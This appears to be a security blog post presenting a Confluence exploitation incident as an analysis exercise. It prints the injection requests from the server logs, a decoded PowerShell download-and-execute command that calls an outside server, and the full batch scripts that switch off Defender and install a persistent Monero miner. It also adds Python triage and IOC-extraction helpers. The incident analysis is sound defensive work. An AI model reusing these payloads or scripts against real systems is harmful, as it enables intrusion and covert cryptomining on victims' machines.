Education

I’m totally in the middle of doing some work but this alert just came in so I have quickly dumped the data:

This came in via a Confluence exploit (not sure which CVE yet). I’ve not got time to analyse but thought I’d share this as an educational exercise for people! It’s a good exercise to see the Apache Tomcat logs and then decode, obtain samples and analyse the activity/impact (as well as yoink IOCs etc.)

Apache Tomcat Access Logs

[06/Jun/2022:09:47:03 +0100] - http-nio-8090-exec-10 143.198.31.252 GET /${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ HTTP/1.1 302 45ms - - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
[06/Jun/2022:09:41:46 +0100] - http-nio-8090-exec-7 85.106.117.49 GET /${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('cmd.exe','/k','powershell.exe -exec bypass -enc JAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJAB0AGUAbQBwAGYAaQBsAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABGAGkAbABlAE4AYQBtAGUAKAApADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgACsAPQAgACcALgBiAGEAdAAnADsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADIAMAAyAC4AMgA4AC4AMgAyADkALgAxADcANAAvAHcAaQBuAC8AawBpAGwAbAAuAGIAYQB0ACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=').start()")}/ HTTP/1.1 302 155ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

So the question here for you is, what CVE is this exploiting?

Warning Risky Code

(Remember to defang all the IPs etc.)

PowerShell encoded command:

JAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJAB0AGUAbQBwAGYAaQBsAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABGAGkAbABlAE4AYQBtAGUAKAApADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgACsAPQAgACcALgBiAGEAdAAnADsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADIAMAAyAC4AMgA4AC4AMgAyADkALgAxADcANAAvAHcAaQBuAC8AawBpAGwAbAAuAGIAYQB0ACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=

Decoded

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://202.28.229[.]174/win/kill.bat', $tempfile); & $tempfile
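As an added worked example (not code from the original post), here is a small Python triage script that parses an access-log line in the layout shown above, pulls the -enc argument out of the request URI, decodes it the way PowerShell's -EncodedCommand expects (base64 over UTF-16LE, which is why a plain base64 decode shows NUL bytes between the characters), and defangs the URLs found in the decoded command in the same style as the post. The sample log line is constructed in the page's layout from the page's own client IP, URI and encoded payload; the regex names, field names and function names are mine.

```python
import base64
import json
import re

# The -enc argument from the page's second access-log entry (copied from the post).
ENCODED_PAGE_PAYLOAD = (
    "JAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYg"
    "BDAGwAaQBlAG4AdAA7ACAAJAB0AGUAbQBwAGYAaQBsAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABGAGkAbABlAE4AYQBtAGUAKAApADsAIAAkAHQAZQBtAHAA"
    "ZgBpAGwAZQAgACsAPQAgACcALgBiAGEAdAAnADsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADIAMAAyAC4AMgA4AC4AMgAyADkALgAxADcANAAvAHcAaQBuAC8AawBpAG"
    "wAbAAuAGIAYQB0ACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA="
)

# Constructed log line in the layout of the page's entries: IP, URI and payload are
# the page's; the '+' of the timezone offset (lost in the page's copy) is restored.
SAMPLE_LOG_LINE = (
    "[06/Jun/2022:09:41:46 +0100] - http-nio-8090-exec-7 85.106.117.49 GET "
    '/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new '
    "java.lang.ProcessBuilder().command('cmd.exe','/k','powershell.exe -exec bypass -enc "
    + ENCODED_PAGE_PAYLOAD
    + "').start()\")}/ HTTP/1.1 302 155ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
)

# Layout of the lines above: [ts] - thread client_ip METHOD uri PROTO status elapsed ...
ACCESS_LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] - (?P<thread>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) "
    r"(?P<uri>.*?) (?P<proto>HTTP/\d\.\d) (?P<status>\d{3}) (?P<elapsed>\d+ms)"
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so matching only the literal "-enc" would miss the shorter spellings.
ENC_FLAG_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
EXEC_BYPASS_RE = re.compile(r"-ex\w*\s+bypass", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
IPV4_LAST_DOT_RE = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})")


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not over ASCII/UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def defang(ioc: str) -> str:
    """Bracket the last dot of an IPv4 address, the way the post writes 202.28.229[.]174."""
    return IPV4_LAST_DOT_RE.sub(r"\1[.]\2", ioc)


def triage_line(line: str) -> dict:
    """Parse one access-log line and return what an analyst wants from it."""
    m = ACCESS_LOG_RE.match(line)
    if not m:
        raise ValueError("line does not match the expected access-log layout")
    uri = m.group("uri")
    decoded = [decode_encoded_command(b) for b in ENC_FLAG_RE.findall(uri)]
    urls = [u for cmd in decoded for u in URL_RE.findall(cmd)]
    return {
        "timestamp": m.group("ts"),
        "client_ip": m.group("ip"),
        "status": int(m.group("status")),
        # A request path that starts with "${" is an expression, not a resource.
        "expression_in_uri": uri.startswith("/${"),
        "execution_policy_bypass": bool(EXEC_BYPASS_RE.search(uri)),
        "decoded_commands": decoded,
        "iocs": [defang(u) for u in urls],
    }


if __name__ == "__main__":
    print(json.dumps(triage_line(SAMPLE_LOG_LINE), indent=2))
```

Run it directly to print the triage as JSON; the decoded command it prints is the one shown above, with the download URL already defanged so the output can be pasted into a ticket. Feed it the whole access log one line at a time and keep only the records where `expression_in_uri` is true or `decoded_commands` is non-empty.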

Downloading Samples for analysis

(Remember to defang all the IPs etc.)

We can download samples like this:

wget "http://202.28.229[.]174/win/kill.bat" -UseBasicParsing -UserAgent "LULZ" -OutFile C:\debug\sample004
wget "http://202.28.229[.]174/win/mad.bat" -UseBasicParsing -UserAgent LULZ -OutFile C:\debug\sample005

kill.bat

@echo off

powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"

taskkill /IM logback.exe /f
taskkill /IM network02.exe /f
taskkill /IM ws_TomcatService.exe /f
taskkill /IM explorer.exe /f
del %TEMP%\network02.exe
del %APPDATA%\network02.exe
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run2" /f
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /f


REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run2" /f
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /f

IF EXIST "%USERPROFILE%\dom" (
    GOTO exist1
) else (
    goto add_it
)

:exist1
tasklist /fi "imagename eq dom.exe" | find ":" >NUL
if not %errorlevel% == 0 (
  echo now is running
  exit /b 1
)
echo [*] Starting dom_miner service
"%USERPROFILE%\dom\dsm.exe" start dom_miner
if errorlevel 0 (
  echo ERROR: Can't start dom_miner service
)
:exist2
tasklist /fi "imagename eq dom.exe" | find ":" >NUL
if not %errorlevel% == 0 (
  echo now is running
  exit /b 1
)

:add_it
echo form exist1
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://202.28.229[.]174/win/mad.bat', $tempfile); & $tempfile ; Remove-Item -Force $tempfile"

This downloads mad.bat:

@echo off

set VERSION=2.5

rem printing greetings

echo MoneroOcean mining setup script v%VERSION%.
echo ^(please report issues to [email protected] email^)
echo.

net session >nul 2>&1
if %errorLevel% == 0 (set ADMIN=1) else (set ADMIN=0)

rem command line arguments
set WALLET=46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN
rem this one is optional
set EMAIL=%2
set site=http://202.28.229[.]174/win
rem checking prerequisites

if [%WALLET%] == [] (
  echo Script usage:
  echo ^> setup_dom_miner.bat ^<wallet address^> [^<your email address^>]
  echo ERROR: Please specify your wallet address
  exit /b 1
)

for /f "delims=." %%a in ("%WALLET%") do set WALLET_BASE=%%a
call :strlen "%WALLET_BASE%", WALLET_BASE_LEN
if %WALLET_BASE_LEN% == 106 goto WALLET_LEN_OK
if %WALLET_BASE_LEN% ==  95 goto WALLET_LEN_OK
echo ERROR: Wrong wallet address length (should be 106 or 95): %WALLET_BASE_LEN%
exit /b 1

:WALLET_LEN_OK

if ["%USERPROFILE%"] == [""] (
  echo ERROR: Please define USERPROFILE environment variable to your user directory
  exit /b 1
)

if not exist "%USERPROFILE%" (
  echo ERROR: Please make sure user directory %USERPROFILE% exists
  exit /b 1
)

where powershell >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "powershell" utility to work correctly
  exit /b 1
)

where find >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "find" utility to work correctly
  exit /b 1
)

where findstr >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "findstr" utility to work correctly
  exit /b 1
)

where tasklist >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "tasklist" utility to work correctly
  exit /b 1
)

if %ADMIN% == 1 (
  where sc >NUL
  if not %errorlevel% == 0 (
    echo ERROR: This script requires "sc" utility to work correctly
    exit /b 1
  )
)

rem calculating port

set /a "EXP_MONERO_HASHRATE = %NUMBER_OF_PROCESSORS% * 700 / 1000"

if [%EXP_MONERO_HASHRATE%] == [] ( 
  echo ERROR: Can't compute projected Monero hashrate
  exit 
)

if %EXP_MONERO_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr 4096 ( set PORT=14096 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr  512 ( set PORT=10512 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr  256 ( set PORT=10256 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr  128 ( set PORT=10128 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr   64 ( set PORT=10064 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr   32 ( set PORT=10032 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr   16 ( set PORT=10016 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr    8 ( set PORT=10008 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr    4 ( set PORT=10004 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr    2 ( set PORT=10002 & goto PORT_OK )
set PORT=10001

:PORT_OK

rem printing intentions

set "LOGFILE=%USERPROFILE%\dom\xmrig.log"

echo I will download, setup and run in background Monero CPU miner with logs in %LOGFILE% file.
echo If needed, miner in foreground can be started by %USERPROFILE%\dom\miner.bat script.
echo Mining will happen to %WALLET% wallet.

if not [%EMAIL%] == [] (
  echo ^(and %EMAIL% email as password to modify wallet options later at https://moneroocean.stream site^)
)

echo.

if %ADMIN% == 0 (
  echo Since I do not have admin access, mining in background will be started using your startup directory script and only work when your are logged in this host.
) else (
  echo Mining in background will be performed using dom_miner service.
)

echo.
echo JFYI: This host has %NUMBER_OF_PROCESSORS% CPU threads, so projected Monero hashrate is around %EXP_MONERO_HASHRATE% KH/s.
echo.


rem start doing stuff: preparing miner

echo [*] Removing previous moneroocean miner (if any)
sc stop dom_miner
sc delete dom_miner
taskkill /f /t /im dom.exe

:REMOVE_DIR0
echo [*] Removing "%USERPROFILE%\dom" directory
timeout 5
rmdir /q /s "%USERPROFILE%\dom" >NUL 2>NUL
IF EXIST "%USERPROFILE%\dom" GOTO REMOVE_DIR0

echo [*] Downloading MoneroOcean advanced version of xmrig to "%USERPROFILE%\dom.zip"
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/dom.zip', '%USERPROFILE%\dom.zip')"
if errorlevel 1 (
  echo ERROR: Can't download MoneroOcean advanced version of xmrig
  goto MINER_BAD
)

echo [*] Unpacking "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\dom.zip', '%USERPROFILE%\dom')"
if errorlevel 1 (
  echo [*] Downloading 7za.exe to "%USERPROFILE%\7za.exe"
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/7za.exe', '%USERPROFILE%\7za.exe')"
  if errorlevel 1 (
    echo ERROR: Can't download 7za.exe to "%USERPROFILE%\7za.exe"
    exit /b 1
  )
  echo [*] Unpacking stock "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
  "%USERPROFILE%\7za.exe" x -y -o"%USERPROFILE%\dom" "%USERPROFILE%\dom.zip" >NUL
  del "%USERPROFILE%\7za.exe"
)
del "%USERPROFILE%\dom.zip"

echo [*] Checking if advanced version of "%USERPROFILE%\dom\dom.exe" works fine ^(and not removed by antivirus software^)
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
"%USERPROFILE%\dom\dom.exe" --help >NUL
if %ERRORLEVEL% equ 0 goto MINER_OK
:MINER_BAD

if exist "%USERPROFILE%\dom\dom.exe" (
  echo WARNING: Advanced version of "%USERPROFILE%\dom\dom.exe" is not functional
) else (
  echo WARNING: Advanced version of "%USERPROFILE%\dom\dom.exe" was removed by antivirus
)

echo [*] Looking for the latest version of Monero miner
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/dom-6.zip', '%USERPROFILE%\dom.zip')"
if errorlevel 1 (
  echo ERROR: Can't download "%MINER_LOCATION%" to "%USERPROFILE%\dom.zip"
  exit /b 1
)

:REMOVE_DIR1
echo [*] Removing "%USERPROFILE%\dom" directory
timeout 5
rmdir /q /s "%USERPROFILE%\dom" >NUL 2>NUL
IF EXIST "%USERPROFILE%\dom" GOTO REMOVE_DIR1

echo [*] Unpacking "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\dom.zip', '%USERPROFILE%\dom')"
if errorlevel 1 (
  echo [*] Downloading 7za.exe to "%USERPROFILE%\7za.exe"
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/7za.exe', '%USERPROFILE%\7za.exe')"
  if errorlevel 1 (
    echo ERROR: Can't download 7za.exe to "%USERPROFILE%\7za.exe"
    exit /b 1
  )
  echo [*] Unpacking advanced "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
  "%USERPROFILE%\7za.exe" x -y -o"%USERPROFILE%\dom" "%USERPROFILE%\dom.zip" >NUL
  if errorlevel 1 (
    echo ERROR: Can't unpack "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
    exit /b 1
  )
  del "%USERPROFILE%\7za.exe"
)
del "%USERPROFILE%\dom.zip"

echo [*] Checking if stock version of "%USERPROFILE%\dom\dom.exe" works fine ^(and not removed by antivirus software^)
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 0,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
"%USERPROFILE%\dom\dom.exe" --help >NUL
if %ERRORLEVEL% equ 0 goto MINER_OK

if exist "%USERPROFILE%\dom\dom.exe" (
  echo WARNING: Stock version of "%USERPROFILE%\dom\dom.exe" is not functional
) else (
  echo WARNING: Stock version of "%USERPROFILE%\dom\dom.exe" was removed by antivirus
)

exit /b 1

:MINER_OK

echo [*] Miner "%USERPROFILE%\dom\dom.exe" is OK

for /f "tokens=*" %%a in ('powershell -Command "hostname | %%{$_ -replace '[^a-zA-Z0-9]+', '_'}"') do set PASS=dom.%%a
if [%PASS%] == [] (
  set PASS=na
)
if not [%EMAIL%] == [] (
  set "PASS=%PASS%:%EMAIL%"
)

powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:%PORT%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"user\": *\".*\",', '\"user\": \"%WALLET%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"%PASS%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"log-file\": *null,', '\"log-file\": \"%LOGFILE2%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 

copy /Y "%USERPROFILE%\dom\config.json" "%USERPROFILE%\dom\config_background.json" >NUL
powershell -Command "$out = cat '%USERPROFILE%\dom\config_background.json' | %%{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config_background.json'" 

rem preparing script
(
echo @echo off
echo tasklist /fi "imagename eq dom.exe" ^| find ":" ^>NUL
echo if errorlevel 1 goto ALREADY_RUNNING
echo start /low %%~dp0dom.exe %%^*
echo goto EXIT
echo :ALREADY_RUNNING
echo echo Monero miner is already running in the background. Refusing to run another one.
echo echo Run "taskkill /IM dom.exe" if you want to remove background miner first.
echo :EXIT
) > "%USERPROFILE%\dom\miner.bat"

rem preparing script background work and work under reboot

if %ADMIN% == 1 goto ADMIN_MINER_SETUP

if exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" (
  set "STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  goto STARTUP_DIR_OK
)
if exist "%USERPROFILE%\Start Menu\Programs\Startup" (
  set "STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup"
  goto STARTUP_DIR_OK  
)

echo ERROR: Can't find Windows startup directory
exit /b 1

:STARTUP_DIR_OK
echo [*] Adding call to "%USERPROFILE%\dom\miner.bat" script to "%STARTUP_DIR%\dom_miner.bat" script
(
echo @echo off
echo "%USERPROFILE%\dom\miner.bat" --config="%USERPROFILE%\dom\config_background.json"
) > "%STARTUP_DIR%\dom_miner.bat"

echo [*] Running miner in the background
call "%STARTUP_DIR%\dom_miner.bat"
goto OK

:ADMIN_MINER_SETUP


echo [*] Creating dom_miner service
sc stop dom_miner
sc delete dom_miner
"%USERPROFILE%\dom\dsm.exe" install dom_miner "%USERPROFILE%\dom\dom.exe"
if errorlevel 1 (
  echo ERROR: Can't create dom_miner service
  exit /b 1
)
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppDirectory "%USERPROFILE%\dom"
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppStdout "%USERPROFILE%\dom\stdout"
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppStderr "%USERPROFILE%\dom\stderr"

echo [*] Starting dom_miner service
"%USERPROFILE%\dom\dsm.exe" start dom_miner
if errorlevel 1 (
  echo ERROR: Can't start dom_miner service
  exit /b 1
)

echo
echo Please reboot system if dom_miner service is not activated yet (if "%USERPROFILE%\dom\xmrig.log" file is empty)
goto OK

:OK
echo
echo [*] Setup complete
exit /b 0

:strlen string len
setlocal EnableDelayedExpansion
set "token=#%~1" & set "len=0"
for /L %%A in (12,-1,0) do (
  set/A "len|=1<<%%A"
  for %%B in (!len!) do if "!token:~%%B,1!"=="" set/A "len&=~1<<%%A"
)
endlocal & set %~2=%len%
exit /b
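Added example, not part of the post or of the MoneroOcean setup script: a static triage of the two batch files above. It runs a handful of regexes over the script text and produces the list an analyst wants in the report: the Defender setting kill.bat disables, the processes it kills, the Run keys it removes, the download URLs, the Monero wallet, the pool endpoint, the service mad.bat installs and the startup folder it writes to. It also reproduces mad.bat's port-selection arithmetic (projected KH/s = CPU threads * 700 / 1000, integer division, then the threshold table) so the destination port to look for in proxy or firewall logs can be predicted from a host's CPU count. The two excerpts are copied from the scripts on this page with the page's defanged IP; the regex names, function names and the `expected_pool_port` helper are mine.

```python
import json
import re

# Excerpts copied from the kill.bat and mad.bat shown above (constructed input for
# this example; the IP keeps the page's defanged form).
KILL_BAT_EXCERPT = r'''@echo off
powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"
taskkill /IM logback.exe /f
taskkill /IM network02.exe /f
taskkill /IM ws_TomcatService.exe /f
taskkill /IM explorer.exe /f
del %TEMP%\network02.exe
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run2" /f
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /f
"%USERPROFILE%\dom\dsm.exe" start dom_miner
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://202.28.229[.]174/win/mad.bat', $tempfile); & $tempfile"
'''

MAD_BAT_EXCERPT = r'''@echo off
set WALLET=46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN
set site=http://202.28.229[.]174/win
taskkill /f /t /im dom.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/dom.zip', '%USERPROFILE%\dom.zip')"
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:%PORT%\",'} | Out-String"
set "STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
) > "%STARTUP_DIR%\dom_miner.bat"
"%USERPROFILE%\dom\dsm.exe" install dom_miner "%USERPROFILE%\dom\dom.exe"
'''

DEFENDER_RE = re.compile(r"Set-MpPreference\s+(-Disable\w+)\s+\$true", re.I)
TASKKILL_RE = re.compile(r"taskkill\b[^\n]*?/im\s+\"?([^\s\"]+)", re.I)
REG_RE = re.compile(r"\breg\s+(add|delete)\s+\"?([^\"\n]+?)\"?\s+/v\s+\"?([^\"\s]+)\"?", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# Standard Monero address: 95 base58 characters starting with 4.
XMR_WALLET_RE = re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")
POOL_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+\.[a-z]{2,}):(%?\w+%?)", re.I)
SERVICE_RE = re.compile(r"(?:dsm\.exe\"?\s+install|sc\s+create)\s+(\S+)", re.I)
STARTUP_RE = re.compile(r"STARTUP_DIR=([^\"\n]+)")

# Threshold table from mad.bat: first threshold the projected hashrate exceeds wins.
PORT_TABLE = ((8192, 18192), (4096, 14096), (2048, 12048), (1024, 11024), (512, 10512),
              (256, 10256), (128, 10128), (64, 10064), (32, 10032), (16, 10016),
              (8, 10008), (4, 10004), (2, 10002))


def triage_batch(name: str, text: str) -> dict:
    """Summarise the observable behaviours of one batch script."""
    return {
        "script": name,
        "defender_tampering": DEFENDER_RE.findall(text),
        "killed_processes": TASKKILL_RE.findall(text),
        "run_key_changes": [(op.lower(), key, val) for op, key, val in REG_RE.findall(text)],
        "urls": sorted(set(URL_RE.findall(text))),
        "monero_wallets": XMR_WALLET_RE.findall(text),
        "pool_endpoints": [f"{host}:{port}" for host, port in POOL_RE.findall(text)],
        "services_installed": SERVICE_RE.findall(text),
        "startup_dirs": STARTUP_RE.findall(text),
    }


def expected_pool_port(cpu_threads: int) -> int:
    """Reproduce mad.bat's port choice: set /a uses integer division."""
    hashrate = cpu_threads * 700 // 1000
    for threshold, port in PORT_TABLE:
        if hashrate > threshold:
            return port
    return 10001


def predicted_pool_endpoint(cpu_threads: int) -> str:
    """Host:port the miner would be configured with on a host of this size."""
    return f"gulf.moneroocean.stream:{expected_pool_port(cpu_threads)}"


if __name__ == "__main__":
    for name, text in (("kill.bat", KILL_BAT_EXCERPT), ("mad.bat", MAD_BAT_EXCERPT)):
        print(json.dumps(triage_batch(name, text), indent=2))
    print("An 8-thread host would connect to", predicted_pool_endpoint(8))
```

The regexes are deliberately loose about quoting and argument order (`taskkill /IM x /f` and `taskkill /f /t /im x` both match) because the two scripts already use both forms; the wallet regex only accepts the 95-character standard address length that mad.bat itself checks for.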

More to follow (hopefully 😉 )